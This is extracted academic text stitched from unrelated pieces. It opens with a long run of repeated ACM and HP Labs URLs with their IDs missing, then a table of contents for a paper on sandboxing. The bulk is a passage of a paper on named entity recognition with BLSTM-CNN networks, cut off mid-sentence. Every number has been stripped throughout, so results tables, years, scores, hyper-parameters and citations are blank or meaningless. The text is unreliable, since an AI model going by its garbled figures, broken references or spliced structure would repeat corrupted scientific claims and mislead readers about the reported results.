http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://www.hpl.hp.com/techreports/ /hpl- - .pdf http://www.hpl.hp.com/techreports/ /hpl- - .pdf http://www.hpl.hp.com/techreports/ /hpl- - .pdf http://www.hpl.hp.com/techreports/ /hpl- - .pdf http://www.hpl.hp.com/techreports/ /hpl- - .pdf http://www.hpl.hp.com/techreports/ /hpl- - .pdf http://www.hpl.hp.com/techreports/ /hpl- - .pdf http://www.hpl.hp.com/techreports/ /hpl- - .pdf http://www.hpl.hp.com/techreports/ /hpl- - .pdf http://www.hpl.hp.com/techreports/ /hpl- - .pdf http://www.hpl.hp.com/techreports/ /hpl- - .pdf http://www.hpl.hp.com/techreports/ /hpl- - .pdf http://www.hpl.hp.com/techreports/ /hpl- - .pdf http://www.hpl.hp.com/techreports/ /hpl- - .pdf http://www.hpl.hp.com/techreports/ /hpl- - .pdf http://www.hpl.hp.com/techreports/ /hpl- - .pdf http://www.hpl.hp.com/techreports/ /hpl- - .pdf http://www.hpl.hp.com/techreports/ /hpl- - .pdf http://www.hpl.hp.com/techreports/ /hpl- - .pdf http://www.hpl.hp.com/techreports/ /hpl- - .pdf http://www.hpl.hp.com/techreports/ /hpl- - .pdf http://www.hpl.hp.com/techreports/ /hpl- - .pdf http://www.hpl.hp.com/techreports/ /hpl- - .pdf http://www.hpl.hp.com/techreports/ /hpl- - .pdf http://www.hpl.hp.com/techreports/ /hpl- - .pdf http://www.hpl.hp.com/techreports/ /hpl- - .pdf http://www.hpl.hp.com/techreports/ /hpl- - .pdf http://www.hpl.hp.com/techreports/ /hpl- - .pdf http://www.hpl.hp.com/techreports/ /hpl- - .pdf http://www.hpl.hp.com/techreports/ /hpl- - .pdf http://www.hpl.hp.com/techreports/ /hpl- - .pdf http://www.hpl.hp.com/techreports/ /hpl- - .pdf http://www.hpl.hp.com/techreports/ /hpl- - .pdf http://www.hpl.hp.com/techreports/ /hpl- - .pdf http://www.hpl.hp.com/techreports/ /hpl- - .pdf http://www.hpl.hp.com/techreports/ /hpl- - .pdf http://www.hpl.hp.com/techreports/ /hpl- - .pdf http://www.hpl.hp.com/techreports/ /hpl- - .pdf http://www.hpl.hp.com/techreports/ /hpl- - .pdf http://www.hpl.hp.com/techreports/ /hpl- - .pdf http://www.hpl.hp.com/techreports/ /hpl- - .pdf http://www.hpl.hp.com/techreports/ /hpl- - .pdf http://www.hpl.hp.com/techreports/ /hpl- - .pdf http://www.hpl.hp.com/techreports/ /hpl- - .pdf http://www.hpl.hp.com/techreports/ /hpl- - .pdf http://www.hpl.hp.com/techreports/ /hpl- - .pdf http://www.hpl.hp.com/techreports/ /hpl- - .pdf http://www.hpl.hp.com/techreports/ /hpl- - .pdf http://www.hpl.hp.com/techreports/ /hpl- - .pdf http://www.hpl.hp.com/techreports/ /hpl- - .pdf http://www.hpl.hp.com/techreports/ /hpl- - .pdf http://dx.doi.org/ . /peerj-cs. a systematic analysis of the science of sandboxing introduction what is a sandbox? methodology picking papers categorizing the dataset analyzing the dataset results sandboxes: building materials for secure systems policy flexibility as a usability bellwether the state of practice in sandbox validation strengthening sandboxing results structured arguments sandbox and policy usability enabling meta-analysis generalizability of methodology meta-analysis challenges and suggested solutions threats to validity conclusion references named entity recognition with bidirectional lstm-cnns jason p.c. chiu university of british columbia jsonchiu@gmail.com eric nichols honda research institute japan co.,ltd. e.nichols@jp.honda-ri.com abstract named entity recognition is a challenging task that has traditionally required large amounts of knowledge in the form of feature engineer- ing and lexicons to achieve high performance. in this paper, we present a novel neural net- work architecture that automatically detects word- and character-level features using a hy- brid bidirectional lstm and cnn architec- ture, eliminating the need for most feature en- gineering. we also propose a novel method of encoding partial lexicon matches in neu- ral networks and compare it to existing ap- proaches. extensive evaluation shows that, given only tokenized text and publicly avail- able word embeddings, our system is com- petitive on the conll- dataset and sur- passes the previously reported state of the art performance on the ontonotes . dataset by . f points. by using two lexicons con- structed from publicly-available sources, we establish new state of the art performance with an f score of . on conll- and . on ontonotes, surpassing systems that employ heavy feature engineering, proprietary lexicons, and rich entity linking information. introduction named entity recognition is an important task in nlp. high performance approaches have been dom- inated by applying crf, svm, or perceptron models to hand-crafted features (ratinov and roth, ; passos et al., ; luo et al., ). however, collobert et al. ( b) proposed an effective neu- ral network model that requires little feature engi- neering and instead learns important features from word embeddings trained on large quantities of un- labelled text – an approach made possible by recent advancements in unsupervised learning of word em- beddings on massive amounts of data (collobert and weston, ; mikolov et al., ) and neural net- work training algorithms permitting deep architec- tures (rumelhart et al., ). unfortunately there are many limitations to the model proposed by collobert et al. ( b). first, it uses a simple feed-forward neural network, which restricts the use of context to a fixed sized window around each word – an approach that discards use- ful long-distance relations between words. second, by depending solely on word embeddings, it is un- able to exploit explicit character level features such as prefix and suffix, which could be useful especially with rare words where word embeddings are poorly trained. we seek to address these issues by propos- ing a more powerful neural network model. a well-studied solution for a neural network to process variable length input and have long term memory is the recurrent neural network (rnn) (goller and kuchler, ). recently, rnns have shown great success in diverse nlp tasks such as speech recognition (graves et al., ), machine translation (cho et al., ), and language mod- eling (mikolov et al., ). the long-short term memory (lstm) unit with the forget gate allows highly non-trivial long-distance dependencies to be easily learned (gers et al., ). for sequential la- belling tasks such as ner and speech recognition, a bi-directional lstm model can take into account an effectively infinite amount of context on both sides of a word and eliminates the problem of limited con- text that applies to any feed-forward model (graves et al., ). while lstms have been studied in the past for the ner task by hammerton ( ), the lack of computational power (which led to the use transactions of the association for computational linguistics, vol. , pp. – , . action editor: masaaki nagata. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. we saw paintings of picasso word embedding additional word features cnn-extracted char features lstm lstm lstm lstm lstm lstm lstm lstm lstm lstm out out out out out forward lstm backward lstm output layers tag scores o o o o s-per best tag sequence figure : the (unrolled) blstm for tagging named en- tities. multiple tables look up word-level feature vectors. the cnn (figure ) extracts a fixed length feature vector from character-level features. for each word, these vec- tors are concatenated and fed to the blstm network and then to the output layers (figure ). of very small models) and quality word embeddings limited their effectiveness. convolutional neural networks (cnn) have also been investigated for modeling character-level in- formation, among other nlp tasks. santos et al. ( ) and labeau et al. ( ) successfully em- ployed cnns to extract character-level features for use in ner and pos-tagging respectively. collobert et al. ( b) also applied cnns to semantic role la- beling, and variants of the architecture have been ap- plied to parsing and other tasks requiring tree struc- tures (blunsom et al., ). however, the effec- tiveness of character-level cnns has not been eval- uated for english ner. while we considered using character-level bi-directional lstms, which was re- cently proposed by ling et al. ( ) for pos- tagging, preliminary evaluation shows that it does not perform significantly better than cnns while be- ing more computationally expensive to train. our main contribution lies in combining these neural network models for the ner task. we present a hybrid model of bi-directional lstms and cnns padding p o padding character embedding additional char features i c a s s convolution max cnn-extracted char features figure : the convolutional neural network extracts char- acter features from each word. the character embed- ding and (optionally) the character type feature vector are computed through lookup tables. then, they are concate- nated and passed into the cnn. that learns both character- and word-level features, presenting the first evaluation of such an architec- ture on well-established english language evalua- tion datasets. furthermore, as lexicons are crucial to ner performance, we propose a new lexicon encod- ing scheme and matching algorithm that can make use of partial matches, and we compare it to the sim- pler approach of collobert et al. ( b). extensive evaluation shows that our proposed method estab- lishes a new state of the art on both the conll- ner shared task and the ontonotes . datasets. model our neural network is inspired by the work of col- lobert et al. ( b), where lookup tables transform discrete features such as words and characters into continuous vector representations, which are then concatenated and fed into a neural network. instead of a feed-forward network, we use the bi-directional long-short term memory (blstm) network. to in- duce character-level features, we use a convolutional neural network, which has been successfully applied to spanish and portuguese ner (santos et al., ) and german pos-tagging (labeau et al., ). . sequence-labelling with blstm following the speech-recognition framework out- lined by graves et al. ( ), we employed lstm lstm forward backward linear log-softmax add figure : the output layers (“out” in figure ) decode output into a score for each tag category. a stacked bi-directional recurrent neural network with long short-term memory units to transform word features into named entity tag scores. figures , , and illustrate the network in detail. the extracted features of each word are fed into a forward lstm network and a backward lstm net- work. the output of each network at each time step is decoded by a linear layer and a log-softmax layer into log-probabilities for each tag category. these two vectors are then simply added together to pro- duce the final output. we tried minor variants of output layer architec- ture and selected the one that performed the best in preliminary experiments. . extracting character features using a convolutional neural network for each word we employ a convolution and a max layer to extract a new feature vector from the per- character feature vectors such as character embed- dings (section . . ) and (optionally) character type (section . ). words are padded with a number of special padding characters on both sides depend- ing on the window size of the cnn. the hyper-parameters of the cnn are the window size and the output vector size. for each direction (forward and backward), the input is fed into multiple layers of lstm units connected in sequence (i.e. lstm units in the second layer take in the output of the first layer, and so on); the number of layers is a tuned hyper- parameter. figure shows only one unit for simplicity. category senna dbpedia location , , miscellaneous , , organization , , person , , , total , , , table : number of entries for each category in the senna lexicon and our dbpedia lexicon. dataset train dev test conll- , , , ( , ) ( , ) ( , ) ontonotes . , , , , / conll- ( , ) ( , ) ( , ) table : dataset sizes in number of tokens (entities) . core features . . word embeddings our best model uses the publicly available - dimensional word embeddings released by collobert et al. ( b) , which were trained on wikipedia and the reuters rcv- corpus. we also experimented with two other sets of pub- lished embeddings, namely stanford’s glove em- beddings trained on billion words from wikipedia and web text (pennington et al., ) and google’s word vec embeddings trained on billion words from google news (mikolov et al., ). in addition, as we hypothesized that word em- beddings trained on in-domain text may perform better, we also used the publicly available glove (pennington et al., ) program and an in-house re-implementation of the word vec (mikolov et al., ) program to train word embeddings on wikipedia and reuters rcv datasets as well. following collobert et al. ( b), all words are lower-cased before passing through the lookup table http://ml.nec-labs.com/senna/ http://nlp.stanford.edu/projects/glove/ https://code.google.com/p/word vec/ we used our in-house reimplementation to train word vec- tors because it uses distributed processing to train much quicker than the publicly-released implementation of word vec and its performance on the word analogy task was higher than reported by mikolov et al. ( ). while collobert et al. ( b) used wikipedia text from , we used wikipedia text from . http://ml.nec-labs.com/senna/ http://nlp.stanford.edu/projects/glove/ https://code.google.com/p/word vec/ text hayao tada , commander of the japanese north china area army loc - - - - - b i - s - - misc - - - s b b i s s s s org - - - - - b i b i i e pers b e - - - - - - s - - figure : example of how lexicon features are applied. the b, i, e, markings indicate that the token matches the begin, inside, and end token of an entry in the lexicon. s indicates that the token matches a single-token entry. to convert to their corresponding embeddings. the pre-trained embeddings are allowed to be modified during training. . . character embeddings we randomly initialized a lookup table with val- ues drawn from a uniform distribution with range [− . , . ] to output a character embedding of dimensions. the character set includes all unique characters in the conll- dataset plus the special tokens padding and unknown. the padding token is used for the cnn, and the unknown token is used for all other characters (which appear in ontonotes). the same set of ran- dom embeddings was used for all experiments. . additional word-level features . . capitalization feature as capitalization information is erased during lookup of the word embedding, we evaluate col- lobert’s method of using a separate lookup table to add a capitalization feature with the following op- tions: allcaps, upperinitial, lowercase, mixedcaps, noinfo (collobert et al., b). this method is compared with the character type feature (section . ) and character-level cnns. . . lexicons most state of the art ner systems make use of lexicons as a form of external knowledge (ratinov preliminary experiments showed that modifiable vectors performed better than so-called “frozen vectors.” upper and lower case letters, numbers, and punctuations we did not experiment with other settings because the en- glish character set is small enough that effective embeddings could be learned directly from the task data. by increments of . determined by evaluating dev set performance. probability of discarding any lstm output node. mini-batch size was excluded from the round particle swarm hyper-parameter search space due to time constraints. and roth, ; passos et al., ). for each of the four categories (person, organization, location, misc) defined by the conll ner shared task, we compiled a list of known named entities from dbpedia (auer et al., ), by extracting all descendants of db- pedia types corresponding to the conll cate- gories. we did not construct separate lexicons for the ontonotes tagset because correspondences be- tween dbpedia categories and its tags could not be found in many instances. in addition, for each entry we first removed parentheses and all text contained within, then stripped trailing punctuation, and fi- nally tokenized it with the penn treebank tokeniza- tion script for the purpose of partial matching. ta- ble shows the size of each category in our lexicon compared to collobert’s lexicon, which we extracted from their senna system. figure shows an example of how the lexicon features are applied. for each lexicon category, we match every n-gram (up to the length of the longest lexicon entry) against entries in the lexicon. a match is successful when the n-gram matches the prefix or suffix of an entry and is at least half the length of the entry. because of the high potential for spuri- ous matches, for all categories except person, we discard partial matches less than tokens in length. when there are multiple overlapping matches within the same category, we prefer exact matches over par- tial matches, and then longer matches over shorter matches, and finally earlier matches in the sentence over later matches. all matches are case insensitive. for each token in the match, the feature is en- the miscellaneous category was populated by entities of the dbpedia categories artifact and work. the punctuation stripped was period, comma, semi-colon, colon, forward slash, backward slash, and question mark. as can been seen in this example, the lexicons – in partic- ular miscellaneous – still contain a lot of noise. hyper-parameter conll- (round ) ontonotes . (round ) final range final range convolution width [ , ] [ , ] cnn output size [ , ] [ , ] lstm state size [ , ] [ , ] lstm layers [ , ] [ , ] learning rate . [ − , − . ] . [ − . , − . ] epochs - - dropout . [ . , . ] . [ , ] mini-batch size - [ , ] table : hyper-parameter search space and final values used for all experiments round conll- ontonotes . . (± . ) . (± . ) . (± . ) . (± . ) table : development set f score performance of the best hyper-parameter settings in each optimization round. coded in bioes annotation (begin, inside, outside, end, single), indicating the position of the token in the matched entry. in other words, b will not appear in a suffix-only partial match, and e will not appear in a prefix-only partial match. as we will see in section . , we found that this more sophisticated method outperforms the method presented by collobert et al. ( b), which treats partial and exact matches equally, allows prefix but not suffix matches, allows very short partial matches, and marks tokens with yes/ no. in addition, since collobert et al. ( b) released their lexicon with their senna system, we also ap- plied their lexicon to our model for comparison and investigated using both lexicons simultaneously as distinct features. we found that the two lexicons complement each other and improve performance on the conll- dataset. our best model uses the senna lexicon with ex- act matching and our dbpedia lexicon with partial matching, with bioes annotation in both cases. . additional character-level features a lookup table was used to output a -dimensional vector representing the type of the character (upper case, lower case, punctuation, other). . training and inference . . implementation we implement the neural network using the torch library (collobert et al., a). training and inference are done on a per-sentence level. the ini- tial states of the lstm are zero vectors. except for the character and word embeddings whose initializa- tion has been described previously, all lookup tables are randomly initialized with values drawn from the standard normal distribution. . . objective function and inference we train our network to maximize the sentence- level log-likelihood from collobert et al. ( b). first, we define a tag-transition matrix a where ai,j represents the score of jumping from tag i to tag j in successive tokens, and a ,i as the score for starting with tag i. this matrix of parameters are also learned. define θ as the set of parameters for the neural network, and θ′ = θ ∪{ai,j ∀i,j} as the set of all parameters to be trained. given an exam- ple sentence, [x]t , of length t , and define [fθ]i,t as the score outputted by the neural network for the tth word and ith tag given parameters θ, then the score of a sequence of tags [i]t is given as the sum of net- work and transition scores: s([x]t , [i] t ,θ ′) = t∑ t= ( a[i]t− ,[i]t + [fθ][i]t,t ) much later, we discovered that training with cross entropy objective while performing viterbi decoding to restrict output to valid tag sequences also appears to work just as well. model conll- ontonotes . prec. recall f prec. recall f ffnn + emb + caps + lex . . . (± . ) . . . (± . ) blstm . . . (± . ) . . . (± . ) blstm-cnn . . . (± . ) . . . (± . ) blstm-cnn + emb . . . (± . ) . . . (± . ) blstm-cnn + emb + lex . . . (± . ) . . . (± . ) collobert et al. ( b) - - . - - - collobert et al. ( b) + lexicon - - . - - - huang et al. ( ) - - . - - - ratinov and roth ( ) . . . . . . lin and wu ( ) - - . - - - finkel and manning ( ) - - - . . . suzuki et al. ( ) - - . - - - passos et al. ( ) - - . - - . durrett and klein ( ) - - - . . . luo et al. ( ) . . . - - - table : results of our models, with various feature sets, compared to other published results. the three sections are, in order, our models, published neural network models, and published non-neural network models. for the features, emb = collobert word embeddings, caps = capitalization feature, lex = lexicon features from both senna and dbpedia lexicons. for f scores, standard deviations are in parentheses. then, letting [y]t be the true tag sequence, the sentence-level log-likelihood is obtained by normal- izing the above score over all possible tag-sequences [j]t using a softmax: log p([y]t | [x]t ,θ′) = s([x]t , [y] t ,θ ′)− log ∑ ∀[j]t es([x] t ,[j] t ,θ ′) this objective function and its gradients can be ef- ficiently computed by dynamic programming (col- lobert et al., b). at inference time, given neural network out- puts [fθ]i,t we use the viterbi algorithm to find the tag sequence [i]t that maximizes the score s([x]t , [i] t ,θ ′). . . tagging scheme the output tags are annotated with bioes (which stand for begin, inside, outside, end, single, indicating the position of the token in the ontonotes results taken from (durrett and klein, ) evaluation on ontonotes . done by pradhan et al. ( ) not directly comparable as they evaluated on an earlier ver- sion of the corpus with a different data split. numbers taken from the original paper (luo et al., ). while the precision, recall, and f scores are clearly inconsis- tent, it is unclear in which way they are incorrect. entity) as this scheme has been reported to outper- form others such as bio (ratinov and roth, ). . . learning algorithm training is done by mini-batch stochastic gradi- ent descent (sgd) with a fixed learning rate. each mini-batch consists of multiple sentences with the same number of tokens. we found applying dropout to the output nodes of each lstm layer (pham et al., ) was quite effective in reducing overfit- ting (section . ). we explored other more sophis- ticated optimization algorithms such as momentum (nesterov, ), adadelta (zeiler, ), and rm- sprop (hinton et al., ), and in preliminary ex- periments they did not improve upon plain sgd. evaluation evaluation was performed on the well-established conll- ner shared task dataset (tjong kim sang and de meulder, ) and the much larger but less-studied ontonotes . dataset (hovy et al., ; pradhan et al., ). table gives an overview of these two different datasets. for each experiment, we report the average and standard deviation of successful trials. adding dropout to inputs seems to have an adverse effect. features blstm blstm-cnn blstm-cnn + lex conll ontonotes conll ontonotes conll ontonotes none . (± . ) . (± . ) . (± . ) . (± . ) . (± . ) . (± . ) emb . (± . ) . (± . ) . (± . ) . (± . ) . (± . ) . (± . ) emb + caps . (± . ) . (± . ) . (± . ) . (± . ) . (± . )* . (± . )* emb + caps + lex . (± . ) . (± . ) . (± . )* . (± . )* . (± . )* . (± . )* emb + char - - . (± . ) . (± . ) . (± . ) . (± . ) emb + char + caps - - . (± . ) . (± . ) . (± . ) . (± . ) table : f score results of blstm and blstm-cnn models with various additional features; emb = collobert word embeddings, char = character type feature, caps = capitalization feature, lex = lexicon features. note that starred results are repeated for ease of comparison. . dataset preprocessing for all datasets, we performed the following pre- processing: • all digit sequences are replaced by a single “ ”. • before training, we group sentences by word length into mini-batches and shuffle them. in addition, for the ontonotes dataset, in order to handle the date, time, money, percent, quantity, ordinal, and cardinal named en- tity tags, we split tokens before and after every digit. . conll dataset the conll- dataset (tjong kim sang and de meulder, ) consists of newswire from the reuters rcv corpus tagged with four types of named entities: location, organization, person, and miscellaneous. as the dataset is small compared to ontonotes, we trained the model on both the train- ing and development sets after performing hyper- parameter optimization on the development set. . ontonotes . dataset pradhan et al. ( ) compiled a core portion of the ontonotes . dataset for the conll- shared task and described a standard train/dev/test split, which we use for our evaluation. following durrett and klein ( ), we applied our model to the por- tion of the dataset with gold-standard named entity annotations; the new testaments portion was ex- cluded for lacking gold-standard annotations. this dataset is much larger than conll- and con- sists of text from a wide variety of sources, such as broadcast conversation, broadcast news, newswire, magazine, telephone conversation, and web text. . hyper-parameter optimization we performed two rounds of hyper-parameter opti- mization and selected the best settings based on de- velopment set performance . table shows the fi- nal hyper-parameters, and table shows the dev set performance of the best models in each round. in the first round, we performed random search and selected the best hyper-parameters over the de- velopment set of the conll- data. we evalu- ated around hyper-parameter settings. then, we took the same settings and tuned the learning rate and epochs on the ontonotes development set. for the second round, we performed independent hyper-parameter searches on each dataset using op- tunity’s implementation of particle swarm (claesen et al., ), as there is some evidence that it is more efficient than random search (clerc and kennedy, ). we evaluated hyper-parameter settings this round as well. as we later found out that train- ing fails occasionally (section . ) as well as large variation from run to run, we ran the top settings from each dataset for trials each and selected the best one based on averaged dev set performance. for conll- , we found that particle swarm produced better hyper-parameters than random search. however, surprisingly for ontonotes par- ticle swarm was unable to produce better hyper- parameters than those from the ad-hoc approach in round . we also tried tuning the conll- hyper-parameters from round for ontonotes and that was not any better either. we trained conll- models for a large num- hyper-parameter optimization was done with the blstm- cnn + emb + lex feature set, as it had the best performance. selected based on dev set performance of a few runs. the result is . (± . ) on the ontonotes dev set. word embeddings conll- ontonotes random d . (± . ) . (± . ) random d . (± . ) . (± . ) glove b d . (± . ) . (± . ) glove b d . (± . ) . (± . ) google b d . (± . ) . (± . ) collobert d . (± . ) . (± . ) our glove d . (± . ) . (± . ) our skip-gram d . (± . ) . (± . ) table : f scores when the collobert word vectors are replaced. we tried - and -dimensional random vec- tors (random d, random d); glove’s released vec- tors trained on billion words (glove b d, glove b d); google’s released -dimensional vectors trained on billion words from google news (google b d); and -dimensional glove and word vec skip-gram vectors that we trained on wikipedia and reuters rcv- (our glove d, our skip-gram d). ber of epochs because we observed that the models did not exhibit overtraining and instead continued to slowly improve on the development set long af- ter reaching near % accuracy on the training set. in contrast, despite ontonotes being much larger than conll- , training for more than about epochs causes performance on the development set to decline steadily due to overfitting. . excluding failed trials on the conll- dataset, while blstm models completed training without difficulty, the blstm- cnn models fail to converge around ∼ % of the time depending on feature set. similarly, on ontonotes, . % of trials fail. we found that using a lower learning rate reduces failure rate. we also tried clipping gradients and using adadelta and both of them were effective at eliminating such failures by themselves. adadelta, however, made training more expensive with no gain in model performance. in any case, for all experiments we excluded trials where the final f score on a subset of training data falls below a certain threshold, and continued to run trials until we obtained successful ones. for conll- , we excluded trials where the final f score on the development set was less than ; there was no ambiguity in selecting the threshold as every trial scored either above or below . for ontonotes, the threshold was a f score of on the last , sentences of the training set; every trial scored either above or below . . training and tagging speed on an intel xeon e - processor, training takes about hours while tagging the test set takes about seconds for conll- . the times are hours and seconds respectively for ontonotes. results and discussion table shows the results for all datasets. to the best of our knowledge, our best models have sur- passed the previous highest reported f scores for both conll- and ontonotes. in particular, with no external knowledge other than word em- beddings, our model is competitive on the conll- dataset and establishes a new state of the art for ontonotes, suggesting that given enough data, the neural network automatically learns the relevant features for ner without feature engineering. . comparison with ffnns we re-implemented the ffnn model of collobert et al. ( b) as a baseline for comparison. ta- ble shows that while performing reasonably well on conll- , ffnns are clearly inadequate for ontonotes, which has a larger domain, showing that lstm models are essential for ner. . character-level cnns vs. character type and capitalization features the comparison of models in table shows that on conll- , blstm-cnn models significantly outperform the blstm models when given the same feature set. this effect is smaller and not sta- tistically significant on ontonotes when capitaliza- tion features are added. adding character type and capitalization features to the blstm-cnn mod- els degrades performance for conll and mostly improves performance on ontonotes, suggesting character-level cnns can replace hand-crafted char- acter features in some cases, but systems with weak lexicons may benefit from character features. wilcoxon rank sum test, p < . when comparing the four blstm models with the corresponding blstm-cnn models using the same feature set. the wilcoxon rank sum test was selected for its robustness against small sample sizes when the distribution is unknown. dropout conll- ontonotes . dev test dev test - . (± . ) . (± . ) . (± . ) . (± . ) . . (± . ) . (± . ) . (± . ) . (± . ) . . (± . ) . (± . ) . (± . ) . (± . ) . . (± . ) . (± . ) . (± . ) . (± . ) . - - . (± . ) . (± . ) . . (± . ) . (± . ) - - . . (± . ) . (± . ) . (± . ) . (± . ) . . (± . ) . (± . ) . (± . ) . (± . ) table : f score results with various dropout values. models were trained using only the training set for each dataset. all other experiments use dropout = . for conll- and dropout = . for ontonotes . . . word embeddings table and table show that we obtain a large, sig- nificant improvement when trained word embed- dings are used, as opposed to random embeddings, regardless of the additional features used. this is consistent with collobert et. al. ( b)’s results. table compares the performance of different word embeddings in our best model in table (blstm-cnn + emb + lex). for conll- , the publicly available glove and google embeddings are about one point behind collobert’s embeddings. for ontonotes, glove embeddings perform close to collobert embeddings while google embeddings are again one point behind. in addition, dimen- sional embeddings present no significant improve- ment over dimensional embeddings – a result pre- viously reported by turian et al. ( ). one possible reason that collobert embeddings perform better than other publicly available em- beddings on conll- is that they are trained on the reuters rcv- corpus, the source of the conll- dataset, whereas the other embed- dings are not . on the other hand, we suspect that google’s embeddings perform poorly because of vo- 